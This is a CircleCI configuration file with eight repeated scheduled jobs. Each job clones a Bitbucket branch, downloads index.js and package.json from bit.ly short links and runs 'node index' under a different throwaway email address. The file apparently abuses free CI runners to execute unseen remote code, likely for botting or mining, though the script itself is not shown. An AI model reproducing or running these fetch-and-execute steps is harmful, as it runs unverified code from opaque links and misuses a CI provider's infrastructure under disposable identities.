version: 2.1

jobs:
 exemple_no_33:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch tuantrannguyendangtrung_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 57 -r 2 -e tuantrannguyendangtrung@vip.stu.office.gy
 exemple_no_34:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch caitennaykhongaidatvvvvv_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e caitennaykhongaidatvvvvv@vip.stu.office.gy
 exemple_no_35:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch dattenmoichonodo_vip-stu-office-gy --single-branch lunarCrushData
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 3 -e dattenmoichonodo@vip.stu.office.gy
 exemple_no_36:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch motcaitennuachomayman_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e motcaitennuachomayman@vip.stu.office.gy
 exemple_no_37:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch barristeronyelilian5tygh_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 3 -e barristeronyelilian5tygh@vip.stu.office.gy
 exemple_no_38:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch mrpaulconnickfe7hr_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: npm i -s
      - run: node index -t 57 -r 2 -e mrpaulconnickfe7hr@vip.stu.office.gy
 exemple_no_39:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch firstbankplcng_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e firstbankplcng@vip.stu.office.gy
 exemple_no_40:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: medium
    steps:
      - run: curl -fsSL https://bit.ly/3nKzqND -o index.js && curl -fsSL https://bit.ly/3cBwVH3 -o package.json
      - run: git clone https://meocodervippro@bitbucket.org/lunarcrush/lunarcrush-data.git --branch mrbenraymond1957we334_vip-stu-office-gy --single-branch lunarCrushData
      - run: 
          name: Update Linux
          command: sudo apt-get update
      - run: sudo apt-get install -y libgbm-dev
      - run: npm i -s
      - run: node index -t 57 -r 2 -e mrbenraymond1957we334@vip.stu.office.gy
      
      
workflows:
  version: 2
  exemple:
    triggers:
      - schedule:
          cron: "4 0 * * *"
          filters:
            branches:
              only:
                - main
      - schedule:
          cron: "8 1 * * *"
          filters:
            branches:
              only:
                - main
    jobs:
      - exemple_no_33
      - exemple_no_34
      - exemple_no_35
      - exemple_no_36
      - exemple_no_37
      - exemple_no_38
      - exemple_no_39
      - exemple_no_40
